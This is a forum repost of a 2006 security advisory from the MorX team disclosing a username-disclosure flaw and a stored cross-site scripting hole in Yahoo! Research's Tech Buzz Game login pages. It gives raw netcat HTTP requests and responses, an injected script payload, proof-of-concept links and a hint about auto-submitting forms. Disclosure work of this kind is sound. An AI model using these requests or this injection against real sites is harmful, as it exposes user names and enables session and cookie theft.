Jump to content
zbeng

Yahoo! Research Multiple vulnerabilites

By zbeng, in Exploituri

Recommended Posts

zbeng Newbie

zbeng

Posted
Posted

Authors: Simo64 and Simo Ben youssef

Contacts : <simo64_at_morx_org> / <simo_at_morx_org>

Discovered: 02 Aout 2006

Published:  17 Aout 2006

MorX Security Research Team

Original Advisory:

http://www.morx.org/YahooResearchMultiple.txt

http://www.morx.org

Service/Product: The Tech Buzz Game

Vendors: Yahoo! Research and O'Reilly Media

Vulnerability: Cross Site Scripting / Users Information Disclosure

Severity: Law/Medium

Tested on: Microsoft IE 6.0 firefox 1.5 and Opera

          (should work on all browsers)

Description:

The Tech Buzz Game is a fledgling research project and demo, rather than a full-fledged Yahoo! product, and it's a product of Yahoo! Research and O'Reilly Media. The marketplace software is powered by Newsfutures. Buzz scores are powered by Yahoo! Search technology and Yahoo! Search Web Services. The buzz scoring methodology was originally developed for the Yahoo! Buzz Index, which tracks web search spikes and trends

for more details, visit:

http://buzz.research.yahoo.com/dm/info/about.html

Details:

1- Usernames disclosure

the login2.html script is writting in a way to store users error information in login.html. if a user fails to sign in to the game, the error returned by login2.html with the username will be stored in login.html. login.html assign each request with an EID numerical value, in fact those information are accessible to anyone thru HTTP

from login.htm source code

<td valign="top" align="center" >

      <form action=hlogin2.html method=post>

      <input type=hidden name=cmd value=Domain.login>

      <input type=hidden name=error.page value=login.html> <--- stores informations back in login.html

Example:

C:>nc buzz.research.yahoo.com 80

GET /dm/login/login.html?eid=100 HTTP/1.1

Host: 127.0.0.1

Connection: Closed

HTTP/1.1 200 OK

Date: Thu, 17 Aug 2006 14:40:46 GMT

Server: Apache/1.3.33 (Unix) mod_ssl/2.8.22 OpenSSL/0.9.7

Transfer-Encoding: chunked

Content-Type: text/html

1d84

--------------------- Scroll down ------------------------

        <td align="left" scope="col">Username:</td>

        <td align="left" scope="col"><input type="text" name="login" value='wil*******' /></td> <--- a previously stored yahoo ID

       

<td class="error" align="left" scope="col"></td>

PoC:

]http://buzz.research.yahoo.com/dm/login/lo...random-numbers]

2- Permanent Cross Site Scripting:

login2.html doesnt only store informations and make them accessible publicly thru login.html but also it fails to properly sanitize user-supplied input when passed thru the variable "login". after successful script injection the input will be stored in login.html with a specific EID

example:

C:>nc buzz.research.yahoo.com 80

POST /dm/login/login2.html HTTP/1.1

Host: 127.0.0.1

Content-Length: 78

Connection: Closed

cmd=Domain.login&error.page=login.html&login=''><script>alert("a")</script>&pw=a

HTTP/1.1 302 Found

Date: Thu, 17 Aug 2006 15:10:47 GMT

Server: Apache/1.3.33 (Unix) mod_ssl/2.8.22 OpenSSL/0.9.7a

Location: /dm/login/login.html?eid=182

Transfer-Encoding: chunked

Content-Type: text/html; charset=iso-8859-1

120

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">

<HTML><HEAD>

<TITLE>302 Found</TITLE>

</HEAD><BODY>

<H1>Found</H1>

The document has moved here.

<HR>

ok now lets get login.html?eid=182 to see if our script was filtered or no

C:>nc buzz.research.yahoo.com 80

GET /dm/login/login.html?eid=182 HTTP/1.1

Host: 127.0.0.1

Connection: Closed

HTTP/1.1 200 OK

Date: Thu, 17 Aug 2006 13:14:18 GMT

Server: Apache/1.3.33 (Unix) mod_ssl/2.8.22 OpenSSL/0.9.7a

Transfer-Encoding: chunked

Content-Type: text/html

1d98

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"

    "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">

<head>

--------------------------Scroll Down ------------------------

Sorry, login failed.</td>

          </tr>

      <tr>

        <td scope="col" align="left" colspan="4"></td>

      </tr>

      <tr>

        <td scope="col" align="left"></td>

        <td align="left" scope="col">Username:</td>

        <td align="left" scope="col"><input type="text" name="login" value='''><script>alert("a")</script>' /></td> <--- not filtred

PoC:

http://www.morx.org/yahooXSSinject.html

Note: the form will need the user to click to submit, an attacker may use a form which will auto-submit the js, using for example the onload attribute

Impact:

an attacker can exploit the vulnerable script to have arbitrary script code executed in the browser of an authentified yahoo user in the context of the vulnerable yahoo website. resulting in the theft of cookie-based authentication giving the attacker full access to the victim's accounts (email box, etc) as well as other type of attacks.

workaround:

avoid clicking on links while being signed in yahoo

Disclaimer:

this entire document is for eductional, testing and demonstrating purpose only. Modification use and/or publishing this information is entirely on your OWN risk. The information provided in this advisory is to be used/tested on your OWN machine/Account. I cannot be held responsible for any of the above.

Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

×
Go to topic listing
×
×
  • Create New...